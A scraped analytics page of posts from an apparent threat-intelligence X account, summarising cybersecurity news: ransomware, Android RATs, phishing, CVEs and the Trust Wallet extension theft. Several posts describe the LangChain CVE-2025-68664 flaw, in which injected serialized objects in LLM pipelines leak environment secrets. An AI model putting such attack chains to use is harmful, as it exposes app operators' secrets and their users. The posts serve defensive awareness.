military operation while public remarks suggested possible cyber/technical effects were used alongside kinetic action. Tor metrics reviewed in the report show a sharp spike in Venezuelan usersconsistent with heightened surveillance fears censorship risk and attempts to reach external information sources. 🎯 Target: Venezuela/Internet & Civil Society (Caracas) # Category: #Venezuela #InternetOutage #NetBlocks" [X Link](https://x.com/ThreatSynop/status/2007858993440362541) 2026-01-04T16:57Z [--] followers, [--] engagements "🚨 Resecurity Baits ShinyHunters/SLH With Decoy Accounts Exposes OPSEC Mistakes Resecurity says actors linked to ShinyHunters / Scattered Lapsus$ Hunters attempted to target an employee but were funneled into a controlled honeypot account packed with realistic-looking yet inactionable data built from breached datasets and generated content. The firm claims the trap captured indicators like IPs/residential proxies and operational mistakes underscoring how deception can turn breach-claims into actionable attribution and detection intel. 🎯 Target: Global/Cybersecurity & Threat Intel # Category:" [X Link](https://x.com/ThreatSynop/status/2007889876457312561) 2026-01-04T19:00Z [--] followers, [--] engagements "🚨 Belkin ConnectAir Turns Any USB-C Device Into a Wireless HDMI Sender (No Wi-Fi Needed) Belkins ConnectAir kit uses a USB-C transmitter and HDMI receiver to push 1080p/60 video over a direct 5GHz link up to [---] feet with plug-and-play setup and support for quickly switching among multiple transmitters. Its positioned for conference rooms classrooms and travel setups where casting protocols or managed Wi-Fi arent reliable. 
🎯 Target: Global/Enterprise AV & Consumers # Category: #CES2026 #Belkin #WirelessHDMI #DisplayTech #EnterpriseIT #AV #Productivity 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2007935861732561155) 2026-01-04T22:03Z [--] followers, [--] engagements "🚨 Xreal 1S Review: Real 3D Pushes Sub-$500 XR Glasses Into Serious Big-Screen Territory ZDNets hands-on says the Xreal 1S delivers a notably more immersive portable display1200p optics [---] nits wider FoV and on-device Real 3D (2D3D conversion) via the X1 chipat around $449. This matters for hybrid work and travel: its a personal private screen for productivity/gaming but it also expands the attack surface (USB-C video accessories companion apps and device trust) if used on unmanaged endpoints. 🎯 Target: Global/Consumers & Mobile Professionals # Category: #Xreal #Xreal1S #XR #ARGlasses" [X Link](https://x.com/ThreatSynop/status/2007951029610877374) 2026-01-04T23:03Z [--] followers, [--] engagements "🚨 DuRoBo Krono Brings Phone-Sized E-Ink + Open Android to CES [----] (A Focus Hub Not a Kindle Clone) Krono is a 6.13" E Ink Carta [----] (300 PPI) pocketable device running open Android (with Play Store access) and a Smart Dial for quick actions like voice-note capture plus built-in AI that transcribes/summarizes notesturning it into a low-distraction reader + productivity companion. For security teams its effectively an Android endpoint: treat it like any BYOD device (app permissions account hygiene and network segmentation) if it enters enterprise workflows. 
🎯 Target: Global/Consumers &" [X Link](https://x.com/ThreatSynop/status/2007982397669712075) 2026-01-05T01:08Z [--] followers, [--] engagements "🚨 SwitchBot Smart Home [---] Goes Big at CES [----] With Onero H1 Household Robot + 3D Face-Mapping Lock Vision SwitchBot unveiled its Onero H1 wheeled humanoid home robot (22 DOF) using an on-device vision-language-action system to manipulate objects and coordinate with existing SwitchBot devices alongside the Lock Vision deadbolt that uses structured-light 3D facial mapping (and advanced biometrics on higher models) to reduce spoofing risk. The lineup signals a shift from single-purpose gadgets to an AI-orchestrated home ecosystemraising both convenience and IoT/privacy governance stakes for" [X Link](https://x.com/ThreatSynop/status/2007982948331483198) 2026-01-05T01:10Z [--] followers, [--] engagements "🚨 SANS Stormcast (Jan [--] 2026): MongoBleed & React2Shell Watchlist Crypto Scam TTPs DNS Timing and Legacy Fortinet Risk The episode recaps ongoing MongoBleed and React2Shell exposure highlights a classic advance-fee crypto scam luring victims with fake pending deposits and shares practical DNS response-time troubleshooting using tshark. It also flags that thousands of Fortinet devices remain unpatched against a five-year-old CVEunderscoring persistent firmware/patch governance gaps. 🎯 Target: Global/IT & Security (DB Network Firewall Admins) # Category: #SANS #Stormcast #MongoBleed" [X Link](https://x.com/ThreatSynop/status/2008007863797493771) 2026-01-05T02:49Z [--] followers, [--] engagements "🚨 Resecurity Honeytrap Turns Attackers Into Intel: ShinyHunters Allegedly Duped by Synthetic Data Resecurity reports it lured a threat actor into a controlled AI-generated honeypot loaded with realistic-but-fake datasets capturing tooling proxy infrastructure and OPSEC slips during large-scale scraping attempts. 
A later update claims ShinyHunters also fell for the decoys amplifying how deception can convert intrusion attempts into actionable IOCs/IOAs without exposing real production data. 🎯 Target: Global/Cybersecurity (Resecurity) # Category: #Honeypot #DeceptionTech #ThreatIntel" [X Link](https://x.com/ThreatSynop/status/2008015546529329643) 2026-01-05T03:19Z [--] followers, [--] engagements Limited data mode. Full metrics available with subscription: lunarcrush.com/pricing
Top assets mentioned: Microsoft Corp. (MSFT), Alphabet Inc Class A (GOOGL), Crowdstrike Holdings Inc (CRWD), Cloudflare, Inc. (NET), Zscaler Inc (ZS), IBM (IBM), ServiceNow Inc (NOW), Bitcoin (BTC)
Top posts by engagements in the last [--] hours
"🚨 : On Safer Internet Day, February [--] [----], Trend Micro, a global cybersecurity leader, announced enhancements to its ScamCheck tool to help consumers identify potential scams and address growing AI threats like deepfakes. :: #Cybersecurity #ScamPrevention #AIThreats Is the News Cybersecurity-Related: Yes, it focuses on enhancing tools to combat online scams and AI-driven threats. ☠ ( ):: Not specified. 🕷 ( ):: Not applicable. 🌐 ( ):: Global. 🕵 :: This is a new development building upon Trend Micro's ongoing efforts to combat online scams and emerging AI threats. 🔎 ::"
X Link 2025-03-17T20:40Z [--] followers, [--] engagements
"🚨 : The U.S. State Department's Global Engagement Center (GEC), established in [----] to counter foreign disinformation campaigns, faced potential closure after its funding was omitted from the National Defense Authorization Act (NDAA) in December [----]. However, subsequent legislative actions ensured the continuation of its functions under a new designation. :: #GovernmentPolicy #Disinformation #NationalSecurity Is the News Cybersecurity-Related: Yes, as it pertains to governmental efforts in combating foreign disinformation, which is a significant aspect of cybersecurity and information"
X Link 2025-03-17T21:18Z [--] followers, [--] engagements
"🚨 : CrowdStrike has achieved Federal Risk and Authorization Management Program (FedRAMP) authorization for several modules within its Falcon cybersecurity platform, specifically for use in the GovCloud environment. These modules include Falcon Next-Gen SIEM, Falcon for IT and Falcon Data Protection, all now available to government entities requiring FedRAMP Moderate authorization. :: #Cybersecurity #FedRAMP #GovCloud #CrowdStrike Is the News Cybersecurity-Related: Yes, it pertains to the authorization of cybersecurity modules designed to enhance the protection of government entities operating"
X Link 2025-03-17T21:18Z [--] followers, [--] engagements
"🚨 : Google's March [----] security update addresses [--] vulnerabilities affecting Android devices, including two actively exploited flaws: CVE-2024-43093: A privilege escalation vulnerability in the Android framework with a CVSS score of [---]. Exploitation requires user interaction, allowing attackers to gain elevated privileges without additional execution rights. CVE-2024-50302: Details unspecified, but noted as under limited, targeted exploitation. The update includes two patch levels, 2025-03-01 and 2025-03-05, to facilitate timely fixes across various devices. Users of Google Pixel devices"
X Link 2025-03-18T12:28Z [--] followers, [--] engagements
"🚨 : 🚨 Brief Summary of the News: Federal agencies are accelerating digital transformation efforts to meet public expectations and comply with mandates. Transitioning securely to platforms like Salesforce requires specialized assistance to ensure data protection and regulatory compliance. Companies like Own Company offer solutions focusing on secure development, data recovery and long-term data archiving to support these modernization initiatives. # : #DigitalTransformation #Cybersecurity #DataProtection #GovernmentIT #Compliance Is the News Cybersecurity-Related: Yes. It discusses the"
X Link 2025-03-18T22:47Z [--] followers, [--] engagements
"🚨 : 🚨 CrowdStrike's Falcon platform has achieved Federal Risk and Authorization Management Program (FedRAMP) High Authorization, enabling U.S. federal agencies, public sector organizations and critical infrastructure entities to secure mission-critical systems and data against cyber threats. This authorization signifies compliance with the highest federal security standards, allowing CrowdStrike to protect highly sensitive information across various sectors. # : #Cybersecurity #FedRAMPHigh #GovernmentSecurity #CloudSecurity #Compliance Is the News Cybersecurity-Related: Yes. It pertains to"
X Link 2025-03-19T18:49Z [--] followers, [--] engagements
"🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a critical vulnerability in HPE OneView that received a CVSS score of 10.0, the highest possible severity. The flaw (CVE-2025-XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring, potentially allowing an unauthenticated attacker to perform remote code execution with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. # :"
X Link 2025-12-19T00:47Z [--] followers, [--] engagements
"🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a critical vulnerability in HPE OneView that received a CVSS score of 10.0, the highest possible severity. The flaw (CVE-2025-XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring, potentially allowing an unauthenticated attacker to perform remote code execution with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. # :"
X Link 2025-12-19T00:50Z [--] followers, [--] engagements
"🚨 : 🚨 The Hacker News discusses the evolving need for dynamic AI SaaS security as organizations increasingly adopt software-as-a-service platforms powered by artificial intelligence. The article highlights challenges in securing AI-enabled SaaS apps, such as API exposure, data leakage, privilege escalation risks and the complexity of applying traditional security controls to dynamic AI workflows. It emphasizes proactive monitoring, contextual access governance, continuous anomaly detection and tailored security controls as essential elements for reducing risk in AI-centric SaaS environments. # :"
X Link 2025-12-19T00:53Z [--] followers, [--] engagements
"🚨 : 🚨 WatchGuard released urgent security updates for a critical Fireware OS vulnerability (CVE-2025-14733, CVSS 9.3) that is being actively exploited to achieve remote unauthenticated code execution via the IKEv2 VPN component (iked). The issue affects Mobile User VPN (IKEv2) and Branch Office VPN (IKEv2) when configured with a dynamic gateway peer, and WatchGuard published fixed versions (e.g. 2025.1.4, 12.11.6, 12.5.15 and 12.3.1 Update [--] for FIPS). The company also shared indicators of attack/compromise such as abnormal IKE certificate-chain behavior, unusually large CERT payloads and iked"
X Link 2025-12-20T23:39Z [--] followers, [--] engagements
"🚨 : 🚨 CISA added a critical ASUS Live Update vulnerability (CVE-2025-59374, CVSS 9.3) to its Known Exploited Vulnerabilities (KEV) catalog after evidence of active exploitation. The flaw is described as an embedded malicious code issue tied to a prior supply-chain compromise in which certain ASUS Live Update client versions were distributed with unauthorized modifications. The compromised builds could trigger unintended actions only on devices that matched specific targeting conditions, and the incident is linked to the [----] Operation ShadowHammer campaign disclosed in [----]. ASUS stated the"
X Link 2025-12-20T23:39Z [--] followers, [--] engagements
"🚨 : 🚨 Cisco warned of active attacks exploiting an unpatched maximum-severity zero-day in Cisco AsyncOS (CVE-2025-20393, CVSS 10.0) affecting Cisco Secure Email Gateway and Cisco Secure Email and Web Manager. Cisco said it became aware of the intrusion campaign on December [--] [----], and that only a limited subset of appliances appear affected, with attackers gaining root-level command execution and deploying a persistence mechanism. Exploitation requires the Spam Quarantine feature to be enabled and internet-reachable (it is not enabled by default). Cisco observed the actor (UAT-9686) using"
X Link 2025-12-20T23:39Z [--] followers, [--] engagements
"🚨 : 🚨 SonicWall released patches for an actively exploited Secure Mobile Access (SMA) [---] series vulnerability (CVE-2025-40602) that allows local privilege escalation due to insufficient authorization in the Appliance Management Console (AMC). SonicWall said attackers have leveraged it in combination with the previously fixed critical flaw CVE-2025-23006 to achieve unauthenticated remote code execution with root privileges. Fixed hotfix builds were issued for affected SMA [---] versions, and CISA added CVE-2025-40602 to its Known Exploited Vulnerabilities (KEV) catalog with a short remediation"
X Link 2025-12-20T23:39Z [--] followers, [--] engagements
"🚨 : 🚨 North Korea-linked Kimsuky has been linked to a campaign distributing an updated Android malware variant called DocSwap via QR codes on phishing sites spoofing South Korea's CJ Logistics. Victims are lured through pop-ups and delivery-themed social engineering to install a fake security/shipment tracking app from an external server; the dropper decrypts an embedded encrypted APK, launches a RAT service and uses decoy OTP-style verification before opening the real CJ Logistics tracking page to reduce suspicion. Once active, the malware connects to an attacker server and supports dozens of"
X Link 2025-12-21T09:53Z [--] followers, [--] engagements
"🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a critical vulnerability in HPE OneView that received a CVSS score of 10.0, the highest possible severity. The flaw (CVE-2025-XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring, potentially allowing an unauthenticated attacker to perform remote code execution with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. # :"
X Link 2025-12-21T23:00Z [--] followers, [--] engagements
"🚨 Fake PoCs and AI Slop Are Polluting Vulnerability Response and Creating Dangerous False Negatives. AI-generated and non-working proof-of-concept exploits are flooding high-profile vulnerability cycles (highlighted via the React2Shell CVSS [----] case), misleading defenders into thinking they're safe because scanners built on bad PoCs return "not vulnerable". The impact is delayed patching and mis-triage: teams deprioritize real risk while attackers iterate past broken public PoCs and exploit faster than organizations can remediate. 🔹 Key Details: Trend Micro tracked [---] public exploits for"
X Link 2025-12-21T23:12Z [--] followers, [--] engagements
"🚨 Askul RansomHouse Ransomware Breach Exposes 700K+ Records, Disrupts Japan Logistics Operations. Askul disclosed that a ransomware attack detected on October [--] [----] disrupted its highly automated order/shipping systems and led to the theft and leak of customer, partner and employee data, with RansomHouse claiming roughly 1TB of stolen files. This matters because it shows how credential-based intrusion plus backup destruction can turn a single enterprise incident into nationwide supply-chain disruption and mass PII exposure. 🕷 Malware: RansomHouse (ransomware / data-extortion) 🎯 Target: Japan"
X Link 2025-12-23T14:05Z [--] followers, [--] engagements
"🚨 Kimsuky Pushes DocSwap Android RAT via QR-Code Phishing Pages Posing as CJ Logistics. Kimsuky is using delivery-themed phishing sites that force desktop visitors to scan a QR code, leading Android victims to install a trojan SecDelivery.apk dropper that decrypts an embedded APK and launches DocSwap with full RAT control (including data theft and audio/camera/file ops) over an attacker server (27.102.137.181). This matters because it blends smishing/phishing, QR redirection and convincing OTP-style decoys to bypass "unknown sources" warnings and turn routine parcel-tracking behavior into"
X Link 2025-12-24T15:04Z [--] followers, [--] engagements
"🚨 ProBit Global Alleged Breach: 700K User Records Offered for Sale on Cybercrime Forum. A threat actor claims to be selling a database allegedly tied to ProBit Global containing [------] rows of user data for $2500 USDT, including PII (names, emails, phone, DOB, full address) and banking details (bank/branch, IFSC, account holder/name/number). Treat this as unverified until ProBit confirms, but the potential impact is high-risk identity fraud, targeted phishing and financial-account abuse for affected users. 🕷 Malware: N/A 🎯 Target: South Korea/Cryptocurrency Exchange Users (Global user base) #"
X Link 2025-12-24T17:43Z [--] followers, [--] engagements
"🚨 SideWinder APT Impersonates India's Income Tax Dept to Deliver DLL Side-Loaded Implant. SideWinder (Rattlesnake/APT-C-17) is running a hyper-targeted phishing campaign that lures Indian victims to a fake Income Tax portal and delivers abusing a legit Microsoft Defender binary (SenseCE.exe) to side-load a malicious DLL (MpGear.dll) and stage a resident agent (mysetup.exe) that beacons to C2 while mimicking Chinese enterprise-tool protocols. The chain includes timezone-based geofencing and cloud-hosted payload delivery (URL shorteners + GoFile) to evade reputation-based controls. 🕷 Malware:"
X Link 2025-12-24T18:40Z [--] followers, [--] engagements
"🚨 Wonderland Android Malware Steals OTPs via Real-Time SMS Hijacking and Remote USSD Control. Group-IB reports Wonderland targets Uzbekistan users with dropper-based infections that unpack an encrypted SMS-stealer locally (even without internet), then uses bidirectional WebSocket C2 to execute live commands like SMS sending, notification suppression, call-forwarding and arbitrary USSD requests, turning phones into remotely operated fraud agents. The operation also hardens itself with fast-changing app/package names, anti-analysis checks (emulator/root/Frida) and resilient domain onboarding via a"
X Link 2025-12-24T18:53Z [--] followers, [--] engagements
"🚨 MacSync Stealer Levels Up: Signed + Notarized Swift Dropper Slips Past Gatekeeper. Jamf reports MacSync Stealer is now delivered as a fully code-signed and notarized Swift application inside a fake DMG, allowing it to pass Gatekeeper checks and quietly fetch/execute a second-stage script from /tmp, with rate-limiting and anti-analysis hygiene. This shift materially lowers user friction and detection odds, enabling faster credential/data theft under the cover of Apple trust signals. 🕷 Malware: MacSync Stealer 🎯 Target: Global/macOS Users # Category: #macOS #Malware #InfoStealer #MacSync"
X Link 2025-12-24T23:11Z [--] followers, [--] engagements
"🚨 Fake Phantom Shuttle Chrome VPN Extensions Run a Stealth Proxy MITM to Steal Credentials. Socket reports two Phantom Shuttle () Chrome extensions have operated since [----], silently injecting hardcoded proxy credentials and forcing traffic for 170+ high-value domains through attacker-controlled proxies to capture logins, cookies, tokens and form data. The extensions also beacon every [--] seconds and periodically exfiltrate user emails and plaintext passwords, creating immediate account-takeover and supply-chain risk (GitHub/npm/cloud consoles). 🕷 Malware: Phantom Shuttle (malicious Chrome"
X Link 2025-12-24T23:13Z [--] followers, [--] engagements
"🚨 U.S. Seizes to Disrupt $14.6M Bank Account Takeover Scheme. The U.S. Justice Department seized a domain and credential database used as a control panel for criminals running malvertising-based bank account takeovers, where fake Google/Bing ads redirected victims to counterfeit bank logins that captured credentials. The FBI has identified at least [--] victims so far, with $28M attempted losses and $14.6M confirmed, and investigators say the infrastructure supported the operation as recently as November [----]. 🕷 Malware: N/A 🎯 Target: USA/Finance (bank customers targeted via search-ad"
X Link 2025-12-24T23:50Z [--] followers, [--] engagements
"🚨 Cl0p Linked to University of Phoenix Breach Affecting 3.5M People. The University of Phoenix is notifying roughly [---] million individuals after an August [----] intrusion attributed to the broader Cl0p extortion ecosystem, with exposed data reportedly including high-risk identifiers such as SSNs and bank routing/account details. The key risk is downstream identity theft and financial fraud at scale, amplified by highly targeted phishing using verified personal data. 🕷 Malware: Cl0p (extortion actor) 🎯 Target: USA/Education # Category: #DataBreach #Cl0p #Extortion #HigherEd #PII #IdentityTheft"
X Link 2025-12-24T23:58Z [--] followers, [--] engagements
"🚨 SEC Sues Crypto Investment Clubs That Used Deepfake Ads and WhatsApp to Steal $14M. The SEC sued multiple entities behind WhatsApp-based investment clubs that used deepfake videos and fake professors to lure retail investors into opening accounts on sham crypto platforms (Morocoin, Berge, Cirkor) and buying fake offerings, then demanded extra fees when victims tried to withdraw. The scheme allegedly ran Jan 2024 to Jan [----] and routed stolen funds through overseas banks and crypto wallets. 🕷 Malware: N/A 🎯 Target: USA/Finance (Retail Investors) # Category: #CryptoScam #SEC #InvestmentFraud"
X Link 2025-12-25T00:11Z [--] followers, [--] engagements
"🚨 SEC Charges Firms Behind $14M Crypto Scam Using Fake AI Signals in WhatsApp Investment Clubs. The SEC alleges scammers used social-media ads to lure retail investors into WhatsApp investment clubs led by fake professors/assistants pushing supposed AI-generated trade tips, then funneled victims to bogus crypto platforms and fake security token offerings before blocking withdrawals and demanding extra fees. At least $14M was stolen and moved offshore through bank accounts and crypto wallets, highlighting how AI-themed credibility + closed messaging groups can scale fraud fast. 🕷 Malware: N/A"
X Link 2025-12-25T00:27Z [--] followers, [--] engagements
"🚨 Everest Ransomware Claims Breaches of Accela and Notin Threatening Massive Data Leaks Everest says it exfiltrated 1TB+ of internal Accela data (including tens of thousands of PDFs/CSVs and backup files) and 145GB from Spains containing sensitive legal workflows and identity documents indicating a high-impact double-extortion play. If validated this creates serious downstream risk for government permitting/licensing processes and notary-related identity theft and fraud. 🕷 Malware: Everest (ransomware / double-extortion) 🎯 Target: USA/GovTech + Spain/Legal Sector # Category: #Ransomware"
X Link 2025-12-25T01:04Z [--] followers, [--] engagements
"🚨 FBI Seizes Backend Panel Used to Run Bank Account Takeovers U.S. authorities seized the domain and its database after criminals used Google/Bing lookalike bank ads to funnel victims to phishing pages and store/operate thousands of stolen banking credentials for account takeover fraud. Investigators linked the scheme to at least [--] U.S. victims with $14.6M in losses (and $28M attempted) with infrastructure still active as recently as November [----]. 🕷 Malware: N/A 🎯 Target: USA/Finance # Category: #FBI #AccountTakeover #Phishing #Malvertising #CredentialTheft #FinancialFraud #DomainSeizure"
X Link 2025-12-25T02:08Z [--] followers, [--] engagements
"🚨 Microsoft Teams Adds Defender-Portal Controls to Block External Users and Domains Microsoft is rolling out an integration that lets security admins manage Teams external blocks (domains and specific email addresses) directly from the Microsoft Defender portal via the Tenant Allow/Block List with support for up to [----] domains and [---] emails. This centralizes response to phishing/spam and risky external contacts without changing existing federation/domain block settings in the Teams admin center. 🕷 Malware: N/A 🎯 Target: Global/Enterprise Collaboration (Microsoft Teams) # Category:"
X Link 2025-12-25T02:16Z [--] followers, [--] engagements
"🚨 Fortinet: 5-Year-Old FortiOS SSL VPN 2FA Bypass Now Actively Exploited Fortinet reports in-the-wild abuse of CVE-2020-12812 where attackers can bypass FortiToken 2FA by changing the usernames letter case under specific local user + remote auth (e.g. LDAP) configurations. Patch affected FortiOS releases and audit SSL-VPN auth logs for suspicious case-variant logins and unexpected successful sessions. 🕷 Malware: N/A 🎯 Target: Global/Organizations Running FortiOS SSL-VPN # Category: #Fortinet #FortiOS #SSLVPN #CVE202012812 #2FABypass #Authentication #VPN #PatchManagement #ThreatIntel 🔗"
X Link 2025-12-27T16:56Z [--] followers, [--] engagements
"🚨 ChatGPT Adds Formatting Blocks to Turn Drafts Into Rich-Text Task Editors OpenAI is rolling out formatting blocks that display outputs like emails/blog drafts inside a rich-text area with an inline toolbar (bold lists quotes alignment) letting users edit content directly in ChatGPT instead of copy/pasting into Word or Gmail. 🕷 Malware: N/A 🎯 Target: Global/ChatGPT Users # Category: #OpenAI #ChatGPT #AI #ProductUpdate #RichText #UX #Productivity 🔗 URL: https://www.bleepingcomputer.com/news/artificial-intelligence/chatgpts-new-formatting-blocks-make-its-ui-look-more-like-a-task-tool/"
X Link 2025-12-27T17:00Z [--] followers, [--] engagements
"🚨 Critical LangChain Flaw Lets Attackers Exfiltrate Secrets via Unsafe Deserialization A critical bug in langchain-core serialization (CVE-2025-68664) enables prompt/LLM-outputinfluenced data to trigger unsafe deserialization paths (e.g. logging/streaming/caching) leaking environment secrets (and potentially enabling further abuse such as SSRF via allowlisted classes). Patch by upgrading langchain-core (fixed in 0.3.81 / 1.2.5) and treat all LLM outputs as untrustedespecially where dumps()/dumpd() and event streaming are used. 🕷 Malware: N/A 🎯 Target: Global/AI Apps & LLM Agent Pipelines #"
X Link 2025-12-27T17:07Z [--] followers, [--] engagements
"🚨 Critical LangChain Serialization Injection Bug Exposes Secrets and May Enable Code Execution A critical flaw in langchain-core (CVE-2025-68664) lets attackers inject crafted lc structures so user-controlled data is treated as LangChain objects during deserialization enabling environment-secret extraction (e.g. when secrets_from_env is enabled) and potentially risky object instantiation paths. Update to langchain-core 1.2.5 or 0.3.81 and restrict deserialization via allowlists to reduce prompt-injection-to-secret-leak chains. 🕷 Malware: N/A 🎯 Target: Global/LLM Apps & Agent Pipelines"
X Link 2025-12-27T17:13Z [--] followers, [--] engagements
"🚨 LangGrinch: Critical LangChain-Core Bug Enables Secret Theft via Serialization Injection (CVE-2025-68664) Attackers can inject crafted lc-key objects through user-influenced fields (e.g. metadata additional_kwargs response_metadata) so dumps()/dumpd() content is later deserialized as trusted LangChain objects enabling environment secret extraction (and potentially RCE paths like Jinja2 templating). Upgrade langchain-core to 1.2.5 (or 0.3.81) and enforce the new allowlist-based allowed_objects defaults (with secrets_from_env now disabled). 🕷 Malware: N/A 🎯 Target: Global/LLM Apps & Agent"
X Link 2025-12-27T17:15Z [--] followers, [--] engagements
"🚨 Trust Wallet Chrome Extension Supply-Chain Attack Drains $7M in Crypto A compromised Trust Wallet Chrome extension update (v2.68.0 released Dec 24) injected obfuscated code to exfiltrate wallet secrets to a newly registered domain (api.metrics-trustwallet.com) leading to roughly $7M in theft; attackers also ran a parallel phishing campaign (fix-trustwallet.com) to trick users into surrendering seed phrases. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #Crypto #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #CryptoTheft"
X Link 2025-12-27T17:18Z [--] followers, [--] engagements
"🚨 Trust Wallet Chrome Extension Supply-Chain Hack Drains $7M from Users A compromised Trust Wallet Chrome extension update (v2.68.0 released Dec [--] 2025) contained obfuscated code that exfiltrated seed phrases on import to a look-alike domain enabling rapid wallet draining and parallel phishing via fake fix sites. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #IncidentResponse 🔗 URL: https://cybersecuritynews.com/trustwallet-chrome-extension-hacked/"
X Link 2025-12-27T17:24Z [--] followers, [--] engagements
"🚨 Chaos Ransomware Claims 150GB Leak From Italys Veplastic Chaos ransomware says it breached Veplastic (VEPLASTIC S.r.l.) and moved into the extortion/leak phase after listing the firm on its dark-web site with an alleged 150GB haul. The exposed dataset is described as including financials supplier/customer contracts and contacts proprietary compound formula/specs employee PII and internal communicationscreating both business disruption and IP/identity risk. 🕷 Malware: Chaos Ransomware 🎯 Target: Italy/Manufacturing (Plastics & Industrial Supply Chain) # Category: #Ransomware #Chaos"
X Link 2025-12-27T17:31Z [--] followers, [--] engagements
"🚨 Trust Wallet Chrome Extension Backdoor Drains $7M After Malicious v2.68 Release A malicious Trust Wallet Chrome extension update (v2.68) stole users decrypted mnemonic phrases during wallet unlock and exfiltrated them to api.metrics-trustwallet.com enabling attackers to drain funds ($7M) and launder via exchanges/bridges; Trust Wallet says the release was pushed using a leaked Chrome Web Store API key bypassing normal checks. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase"
X Link 2025-12-27T17:35Z [--] followers, [--] engagements
"🚨 China-Linked Evasive Panda Runs DNS Poisoning to Push MgBot via Fake Software Updates Kaspersky says Evasive Panda (StormBamboo/Bronze Highland) poisoned DNS responses to redirect legitimate update checks (e.g. SohuVA iQIYI IObit Tencent QQ even requests) to attacker infrastructure delivering a multi-stage loader that decrypts shellcode and installs the MgBot backdoor. This matters because DNS-layer manipulation can silently subvert trusted update flows across specific ISPs/regions enabling high-stealth espionage with minimal endpoint indicators. 🕷 Malware: MgBot 🎯 Target: Trkiye / China"
X Link 2025-12-27T17:37Z [--] followers, [--] engagements
"🚨 Aflac Confirms June Breach Impacting 22M+ Customers Aflac says an unauthorized actor accessed files on June [--] [----] (no ransomware contained within hours) and later determined the incident affected personal data tied to over [--] million individuals triggering large-scale notifications. The impact is high due to potential exposure of sensitive identity/insurance data that can drive fraud identity theft and targeted social engineering. 🕷 Malware: N/A 🎯 Target: USA/Insurance # Category: #DataBreach #Aflac #Insurance #PII #IdentityTheft #IncidentResponse #Cybercrime 🔗 URL:"
X Link 2025-12-27T17:40Z [--] followers, [--] engagements
"🚨 Fake Grubhub Holiday Crypto Promotion Emails Push 10x Bitcoin Scam Attackers sent unauthorized emails that appeared to come from Grubhubs legitimate subdomain urging recipients to send Bitcoin to a wallet with a false promise of a 10x payout; Grubhub says it contained the issue and is taking steps to prevent recurrence. 🕷 Malware: N/A 🎯 Target: Global/Grubhub merchant partners & recipients # Category: #CryptoScam #BusinessEmailCompromise #BrandImpersonation #Phishing #Fraud #EmailSecurity 🔗 URL:"
X Link 2025-12-27T17:44Z [--] followers, [--] engagements
"🚨 Trust Wallet Confirms Malicious Chrome Extension Update Caused $7M Crypto Theft Trust Wallet says a compromised Chrome extension release (v2.68.0 on Dec 24) included hidden code that exfiltrated wallet secrets to api.metrics-trustwallet.com enabling $7M in theft while attackers also pushed a fix-trustwallet.com phishing site to steal recovery phrases. Users should update to v2.69 immediately and move remaining funds to a new wallet/seed if they opened v2.68.0. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack"
X Link 2025-12-27T17:46Z [--] followers, [--] engagements
"🚨 Trust Wallet Urges Immediate Chrome Extension Update After $7M Losses Trust Wallet says a security incident affecting its Chrome extension v2.68 led to $7M in losses after malicious code decrypted users mnemonics (using the wallet password) and exfiltrated them to an attacker-controlled domain enabling rapid wallet draining; users must upgrade to v2.69 and beware of off-channel messages/phishing. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #IncidentResponse 🔗 URL:"
X Link 2025-12-27T17:51Z [--] followers, [--] engagements
"🚨 TeamViewer DEX NomadBranch Bugs Enable LAN RCE DoS and Data Exposure Multiple flaws in TeamViewer DEX Clients Content Distribution Service (NomadBranch.exe) can let an adjacent-network attacker bypass integrity checks for code execution (CVE-2025-44016) or crash/abuse the service for DoS and potential sensitive-data exposure (incl. CVE-2025-12687) fixed in 25.11.0.29 with hotfixes for select legacy branches. 🕷 Malware: N/A 🎯 Target: Global/Windows Enterprise (TeamViewer DEX on shared LAN) # Category: #TeamViewer #DEX #NomadBranch #CVE202544016 #CVE202512687 #CVE202546266 #RCE #DoS"
X Link 2025-12-27T17:55Z [--] followers, [--] engagements
"🚨 New MongoDB Flaw Lets Unauthenticated Attackers Read Uninitialized Heap Memory (CVE-2025-14847) A high-severity zlib compression parsing issue (length-field mismatch) can let unauthenticated clients trigger MongoDB to return uninitialized heap memory potentially disclosing sensitive in-memory data that aids further exploitation; upgrade to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched. 🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #CVE202514847 #Vulnerability #InfoDisclosure #Zlib"
X Link 2025-12-27T17:59Z [--] followers, [--] engagements
"🚨 Trust Wallet Chrome Extension Supply-Chain Hack Leads to $7M Crypto Theft Attackers pushed a malicious Trust Wallet Chrome extension update (v2.68) that exfiltrated users decrypted seed phrases to attacker infrastructure enabling rapid wallet draining and millions in losses. Users should update to the fixed release and rotate wallets/seeds if they interacted with the compromised version. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #IncidentResponse #ThreatIntel 🔗 URL:"
